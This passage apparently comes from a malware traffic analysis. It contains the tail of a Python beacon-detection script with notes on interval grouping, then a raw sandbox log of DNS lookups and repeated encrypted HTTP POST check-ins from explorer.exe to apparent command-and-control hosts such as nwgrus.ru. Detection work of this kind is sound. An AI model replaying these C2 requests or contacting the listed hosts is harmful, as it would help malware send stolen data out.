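            seen.add((sip, sp))
            starts.append((ts, dip, dp))
    return starts


def burst_starts(times, window=2.0):
    """Collapse connections opened within `window` s of a burst's first one into
    one event (a pair of TLS sessions per check-in counts once). The window is a
    chosen parameter, not something the report states."""
    events = []
    for t in sorted(times):
        if not events or (t - events[-1]).total_seconds() > window:
            events.append(t)
    return events


def beacon_profile(lines, key=lambda ip, port: (ip, port), window=2.0):
    """Per group: connection count, burst count, gaps between bursts (s), median, spread."""
    grouped = defaultdict(list)
    for ts, dip, dp in connection_starts(lines):
        grouped[key(dip, dp)].append(ts)
    profile = {}
    for dst, times in grouped.items():
        events = burst_starts(times, window)
        gaps = [round((b - a).total_seconds(), 1) for a, b in zip(events, events[1:])]
        profile[dst] = {"connections": len(times), "events": len(events), "intervals": gaps,
                        "period": median(gaps) if gaps else None,
                        "jitter": max(gaps) - min(gaps) if gaps else None}
    return profile


def periodic(profile, min_events=3, max_jitter=5.0):
    """Groups contacted at least `min_events` times with near-constant gaps."""
    return [g for g, p in profile.items()
            if p["events"] >= min_events and p["jitter"] is not None and p["jitter"] <= max_jitter]


if __name__ == "__main__":
    rows = PACKETS.splitlines()
    for dst, p in beacon_profile(rows).items():
        print(dst, p["intervals"], "median", p["period"])
    # Grouping by port alone follows the HTTP check-ins across the server IP
    # change that happened after the C2 host was re-resolved mid-run.
    for port, p in beacon_profile(rows, key=lambda ip, port: port).items():
        print(port, p["intervals"], "median", p["period"])
```

Grouping by (IP, port) splits the HTTP beacon into two short series because the server address changed mid-run; grouping by destination port (or, with a DNS join, by resolved hostname) recovers the single ~21 s cadence. The burst window matters for the TLS traffic: without it the one-second spacing between the paired sessions would dominate the median and hide the ~22 s period.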
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 7, 2024 14:59:20.448164940 CEST  56304        53         192.168.2.5      1.1.1.1
Oct 7, 2024 14:59:21.439896107 CEST  56304        53         192.168.2.5      1.1.1.1
Oct 7, 2024 14:59:22.466022968 CEST  56304        53         192.168.2.5      1.1.1.1
Oct 7, 2024 14:59:22.772443056 CEST  53           56304      1.1.1.1          192.168.2.5
Oct 7, 2024 14:59:22.772464991 CEST  53           56304      1.1.1.1          192.168.2.5
Oct 7, 2024 14:59:22.772475004 CEST  53           56304      1.1.1.1          192.168.2.5
Oct 7, 2024 15:00:12.271975994 CEST  56264        53         192.168.2.5      1.1.1.1
Oct 7, 2024 15:00:13.284019947 CEST  56264        53         192.168.2.5      1.1.1.1
Oct 7, 2024 15:00:13.689789057 CEST  53           56264      1.1.1.1          192.168.2.5
Oct 7, 2024 15:00:13.689802885 CEST  53           56264      1.1.1.1          192.168.2.5
Oct 7, 2024 15:00:14.723191023 CEST  64176        53         192.168.2.5      1.1.1.1
Oct 7, 2024 15:00:15.154860020 CEST  53           64176      1.1.1.1          192.168.2.5
Oct 7, 2024 15:02:06.517864943 CEST  64150        53         192.168.2.5      1.1.1.1
Oct 7, 2024 15:02:06.879978895 CEST  53           64150      1.1.1.1          192.168.2.5
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Oct 7, 2024 14:59:20.448164940 CEST  192.168.2.5  1.1.1.1  0x53f4    Standard query (0)  nwgrus.ru           A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:21.439896107 CEST  192.168.2.5  1.1.1.1  0x53f4    Standard query (0)  nwgrus.ru           A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.466022968 CEST  192.168.2.5  1.1.1.1  0x53f4    Standard query (0)  nwgrus.ru           A (IP address)  IN (0x0001)  false
Oct 7, 2024 15:00:12.271975994 CEST  192.168.2.5  1.1.1.1  0xb5b1    Standard query (0)  calvinandhalls.com  A (IP address)  IN (0x0001)  false
Oct 7, 2024 15:00:13.284019947 CEST  192.168.2.5  1.1.1.1  0xb5b1    Standard query (0)  calvinandhalls.com  A (IP address)  IN (0x0001)  false
Oct 7, 2024 15:00:14.723191023 CEST  192.168.2.5  1.1.1.1  0x7d20    Standard query (0)  bestworldhools.com  A (IP address)  IN (0x0001)  false
Oct 7, 2024 15:02:06.517864943 CEST  192.168.2.5  1.1.1.1  0x5189    Standard query (0)  nwgrus.ru           A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name       CName  Address          Type            Class        DNS over HTTPS
Oct 7, 2024 14:59:22.772443056 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      105.197.97.247   A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772443056 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      190.147.2.86     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772443056 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      119.204.11.2     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772443056 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      190.220.21.28    A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772443056 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      186.123.165.48   A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772443056 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      116.58.10.60     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772443056 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      185.12.79.25     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772443056 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      148.230.249.9    A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772443056 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      93.118.137.82    A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772443056 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      212.112.110.243  A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772464991 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      105.197.97.247   A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772464991 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      190.147.2.86     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772464991 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      119.204.11.2     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772464991 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      190.220.21.28    A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772464991 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      186.123.165.48   A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772464991 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      116.58.10.60     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772464991 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      185.12.79.25     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772464991 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      148.230.249.9    A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772464991 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      93.118.137.82    A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772464991 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      212.112.110.243  A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772475004 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      105.197.97.247   A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772475004 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      190.147.2.86     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772475004 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      119.204.11.2     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772475004 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      190.220.21.28    A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772475004 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      186.123.165.48   A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772475004 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      116.58.10.60     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772475004 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      185.12.79.25     A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772475004 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      148.230.249.9    A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772475004 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      93.118.137.82    A (IP address)  IN (0x0001)  false
Oct 7, 2024 14:59:22.772475004 CEST  1.1.1.1    192.168.2.5  0x53f4    No error (0)  nwgrus.ru  -      212.112.110.243  A (IP address)  IN (0x0001)  false
                                        Oct 7, 2024 15:00:13.689789057 CEST1.1.1.1192.168.2.50xb5b1No error (0)calvinandhalls.com188.40.141.211A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:00:13.689802885 CEST1.1.1.1192.168.2.50xb5b1No error (0)calvinandhalls.com188.40.141.211A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:00:15.154860020 CEST1.1.1.1192.168.2.50x7d20No error (0)bestworldhools.com188.40.141.211A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru189.195.132.134A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru201.229.130.162A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                        Oct 7, 2024 15:02:06.879978895 CEST1.1.1.1192.168.2.50x5189No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                        Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49770 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:23.357438087 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://bmrvdxbbdeon.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 338
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:23.357517004 CEST | 338 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 29 a6 e9
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA .[k,vuV)D~~cRc)n%m8g83NM4\Yhy&F>MfwT<C-&KPG`ZDWitC5
                                        Oct 7, 2024 14:59:24.450309992 CEST | 152 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:24 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 04 00 00 00 72 e8 87 ee
                                        Data Ascii: r


                                        Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49776 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:24.462007999 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://hkxxphsdfyiakovt.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 350
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:24.462030888 CEST | 350 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 7f 43 f9 e2
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuCHMPWtorGa6^gm\_TPgc6Uxp-4hjLG"[T`lbU;3&wvM4MF4s
                                        Oct 7, 2024 14:59:25.373585939 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:25 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49782 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:25.383702993 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://hgegifhrmen.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 174
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:25.383718967 CEST | 174 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 27 04 b3 8a
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu'oLUb6JsFEe[s>R~"UO}8Ju?aY0cz
                                        Oct 7, 2024 14:59:26.313987970 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:26 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49788 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:26.323055029 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://jqmiciumjrg.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 142
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:26.323072910 CEST | 142 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3b 47 d5 a1
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu;GSF~\Q/8C+r/(@^|FdWV
                                        Oct 7, 2024 14:59:27.264467001 CEST | 137 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:27 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49794 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:27.273969889 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://xlakrjktmvagfqhe.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 259
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:27.273998022 CEST | 259 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 67 39 b7 90
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vug9?xXK}r^bs6CP#a*@|gZ"By BFi?FkAF{,0PqQdCU+YY%*_u
                                        Oct 7, 2024 14:59:28.191555023 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:28 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49804 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:28.202608109 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://cvqgcpbdqadirwgw.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 169
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:28.202627897 CEST | 169 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 41 55 e6 94
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuAUVGxtee2e5vkGdHe\OD9(CHx;MN{=P#Ql
                                        Oct 7, 2024 14:59:29.129834890 CEST | 137 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:28 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49810 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:29.138952017 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://rhtihevserv.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 178
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:29.138984919 CEST | 178 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 5d 04 b7 a2
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu]jUqiQt/D|)@xEwIF>}GTHt;R~[UEjQO
                                        Oct 7, 2024 14:59:30.253298998 CEST | 137 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:29 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49814 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:30.263648987 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://xvhoixsulem.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 149
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:30.263648987 CEST | 149 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 67 43 d1 8c
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vugCe[nriMo({rjXc[CkOTV-I;*.`
                                        Oct 7, 2024 14:59:31.175985098 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:31 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49822 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:31.185761929 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://eywbfvbvilup.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 196
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:31.185786009 CEST | 196 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 64 54 fd aa
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vudTKLNY8o_|(yRX~`z2C1s33RX0I{r)dy2'<r'Y
                                        Oct 7, 2024 14:59:32.218347073 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:32 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49831 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:32.228586912 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://garnufhrqshsv.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 251
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:32.228606939 CEST | 251 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 67 09 e3 f5
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuge`Z}10_LccWeJ*|+=TF1DW(Mj.h"BW8)N&Rks9#Ge]2f{]4OA|,oC/
                                        Oct 7, 2024 14:59:33.173722982 CEST | 137 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:33 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49837 | Destination IP: 105.197.97.247 | Destination Port: 80 | PID: 1028 | Process: C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:33.182248116 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://jpqykkhyhkjhpkd.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 186
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:33.182384968 CEST | 186 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 54 1c ff eb
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuTZMk{a3%E.!5p@o)W\HJA"**RY+eG6DF
                                        Oct 7, 2024 14:59:34.105287075 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:33 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
